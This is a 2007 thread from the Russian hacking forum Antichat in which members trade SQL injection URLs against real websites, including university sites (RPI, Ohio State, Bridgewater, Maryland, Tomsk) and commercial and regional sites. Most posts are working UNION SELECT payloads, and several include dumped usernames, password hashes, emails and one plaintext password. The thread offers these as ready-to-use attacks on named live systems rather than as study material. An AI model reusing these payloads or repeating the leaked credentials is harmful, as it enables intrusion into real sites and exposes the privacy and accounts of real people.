ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Выпускники!
  #2231  
Старый 19.05.2007, 04:08
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию Выпускники!

Продолжаем тему выпускников.
В этот раз Ассоциация выпускников ТПУ(Томск).
alumni.tpu.ru


Первый раз сталкиваюсь с БД ORACLE в таких проектах

Короче смог подобрать количество столбцов = 41
Код:
http://alumni.tpu.ru/showitem.php?id=688'+union+select+null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+sys.dual--
А так же удалось вытащить имя одной таблицы VIPUSKNIKI и одного столбца в ней USER
Код:
http://alumni.tpu.ru/showitem.php?id=-12
Но на этом все , то ли отображаемых столбцов нет, толи потому что оракул у мя в первый раз короче дальше хз...

Млин да и вообще уже скули снится стали, пора завязывать
 
Ответить с цитированием

.edu
  #2232  
Старый 19.05.2007, 11:31
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию .edu

Код:
http://rpitv.union.rpi.edu/news.php?newsid=-5+union+select+TABLE_NAME,2,3,4+from+INFORMATION_SCHEMA.TABLES+limit+26,1
http://rpitv.union.rpi.edu/news.php?newsid=-5+union+select+concat_ws(0x3a,username,password,email),2,3,4+from+member+limit+1,1
clarka3:hiSeGxynSh85I:clarka3@rpi.edu

=======================================

Код:
http://www.geology.ohio-state.edu/news_detail.php?newsId=-1+union+select+1,2,concat_ws(0x3a,user,password),4,5,6+from+mysql.user+limit+1,1
http://www.geology.ohio-state.edu/news_detail.php?newsId=-1+union+select+1,2,concat_ws(0x3a,user,password),4,5,6+from+mysql.user+limit+2,1
root:
michael:1cd219690c8c93cd


=======================================

Код:
http://www.bridgewater.edu/index.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18,19,20+from+users+limit+1,1
Matt:Grape$

=======================================
__________________
..
 
Ответить с цитированием

  #2233  
Старый 19.05.2007, 12:03
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

Цитата:
http://www.psihologu.ru/index.php?action=refall&p=NjUzNCB1bmlvbiBzZWxlY3Qg VVNFUigpLyo=
прикольная скуля, жалко слепая, и таблиц не подобрал(
base64(6534 union select USER()/*)=NjUzNCB1bmlvbiBzZWxlY3QgVVNFUigpLyo=
 
Ответить с цитированием

  #2234  
Старый 19.05.2007, 12:45
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
Отправить сообщение для Muhacir с помощью ICQ
По умолчанию

www.toyota.com.tw
Код:
http://www.toyota.com.tw/vehicle/vehicle_index.asp?CategoryID=216'
 
Ответить с цитированием

sql
  #2235  
Старый 19.05.2007, 13:08
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

sakha.net Саха(Якутия)
Цитата:
http://sakha.net/?s=news&ncat=-9+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(0x3a,user(),version(),database()),0x55),0x55),4 ,5,6,7,8,9,0,1,2,3,4,5/*
 
Ответить с цитированием

  #2236  
Старый 19.05.2007, 13:49
ForWarD-Hack
Новичок
Регистрация: 22.01.2007
Сообщений: 10
Провел на форуме:
78255

Репутация: 12
Отправить сообщение для ForWarD-Hack с помощью ICQ
По умолчанию

Цитата:
http://www.email.ee/atmail.pl?username='UNION%20SELECT%201,2,3/**&pop3host=email.ee
сам не копался но скуль там есть
 
Ответить с цитированием

  #2237  
Старый 19.05.2007, 16:14
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Код:
http://www.defa.ru/tv/porto/index.php?idc=213&cc=1&idw=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11,12,13/*
Код:
http://www.vkf.ru/index.php?action=prod&type=detail&id=-1+union+select+1,2,3,4,concat(database(),char(58),user(),char(58),version()),6,7,8,9,10,11/*
Код:
http://www.skazki.org.ru/pda/view.php?id=-1+union+select+concat(database(),char(58),user(),char(58),version()),2,3,4,5/*
 
Ответить с цитированием

  #2238  
Старый 20.05.2007, 00:42
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию

Код:
http://www.jahireisid.ee/index.php?id=-3+union+select+AES_DECRYPT(AES_ENCRYPT(version(),0x78),0x78)/*
Код:
http://www.garmin.ee/index.php?ID=-3+union+select+pageType,pageFile,3,4+from+menu/*

Последний раз редактировалось _Pantera_; 20.05.2007 в 00:46..
 
Ответить с цитированием

  #2239  
Старый 20.05.2007, 00:44
KPOT_f!nd
Познавший АНТИЧАТ
Регистрация: 25.08.2006
Сообщений: 1,524
Провел на форуме:
3405508

Репутация: 1745


По умолчанию

Код:
http://inkaluga.ru/econ_mun/review.php?id=-51+union+select+concat(user(),0x3a,version(),0x3a,database())/*
Код:
http://www.fin.org.ua/newws.php?i=51002+union+select+1,database(),user(),version(),5+from+users/*
 
Ответить с цитированием

Oracle;)
  #2240  
Старый 20.05.2007, 02:04
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию Oracle;)

University of Maryland

www.umd.edu

Опять на Oracle нарвался, вот мне везет, но на ентот раз получилось хотя бы вычислить принтабильные столбцы

Код:
http://www.newsdesk.umd.edu/uniini/release.cfm?ArticleID=-1+union+select+1,null,null,null,sys.login_user+from+sys.dual--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ